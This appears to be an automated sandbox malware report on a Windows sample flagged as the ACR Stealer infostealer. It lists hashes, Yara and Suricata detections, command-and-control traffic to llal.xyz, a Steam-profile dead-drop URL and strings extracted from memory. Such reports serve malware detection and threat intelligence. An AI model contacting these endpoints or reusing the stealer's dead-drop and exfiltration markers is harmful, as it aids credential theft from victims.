
Windows Analysis Report
OXoeX1Ii3x.exe

Overview

General Information

Sample name: OXoeX1Ii3x.exe (renamed because the original name is a hash value)
Original sample name: 3e9881b9c6ff4994fc9d684456694e77.exe
Analysis ID: 1582973
MD5: 3e9881b9c6ff4994fc9d684456694e77
SHA1: 370244669daea5f87c797d6ad240adbfb7006384
SHA256: a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
Tags: exe, user-abuse_ch

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • OXoeX1Ii3x.exe (PID: 4396 cmdline: "C:\Users\user\Desktop\OXoeX1Ii3x.exe" MD5: 3E9881B9C6FF4994FC9D684456694E77)
    • WerFault.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source: OXoeX1Ii3x.exe
Rule: infostealer_win_acrstealer_str
Description: Finds ACR Stealer standalone samples based on specific strings.
Author: Sekoia.io
Strings:
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/
Source: 0.2.OXoeX1Ii3x.exe.200000.0.unpack
Rule: infostealer_win_acrstealer_str
Description: Finds ACR Stealer standalone samples based on specific strings.
Author: Sekoia.io
Strings: the same fourteen strings ($str01 to $str15) at the same offsets as the file match above

Source: 0.0.OXoeX1Ii3x.exe.200000.0.unpack
Rule: infostealer_win_acrstealer_str
Description: Finds ACR Stealer standalone samples based on specific strings.
Author: Sekoia.io
Strings: the same fourteen strings ($str01 to $str15) at the same offsets as the file match above
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T09:12:06.422346+0100 | 2052674 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-01T09:12:05.545826+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP
2025-01-01T09:12:06.422346+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | TCP

AV Detection

Source: OXoeX1Ii3x.exe | Avira: detected
Source: OXoeX1Ii3x.exe | Virustotal: Detection: 52%
Source: OXoeX1Ii3x.exe | ReversingLabs: Detection: 68%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: OXoeX1Ii3x.exe | Joe Sandbox ML: detected
Source: OXoeX1Ii3x.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: OXoeX1Ii3x.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_0023576B FindFirstFileExW, 0_2_0023576B
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_00207A82 __EH_prolog3_GS, FindFirstFileA, PathMatchSpecA, FindFirstFileA, FindNextFileA, FindClose, FindNextFileA, FindClose, FindClose, FindClose, 0_2_00207A82

Networking

Source: Network traffic | Suricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.5:49705 -> 188.114.96.3:443
Source: DNS query: llal.xyz
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49704 -> 104.102.49.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1 | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: steamcommunity.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1 | User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603 | Host: llal.xyz | Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exe | Code function: 0_2_002173CD InternetOpenUrlA, InternetReadFile, 0_2_002173CD
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
Source: OXoeX1Ii3x.exe, 00000000.00000002.2505872324.000000000313A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://community.fastly4
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d3
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dL
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842db
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dy
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyzuser
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/badges
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/inventory/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930AC
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930HS
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930O
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930QC
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930V
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930yB
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930~
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;eE
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/poin
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
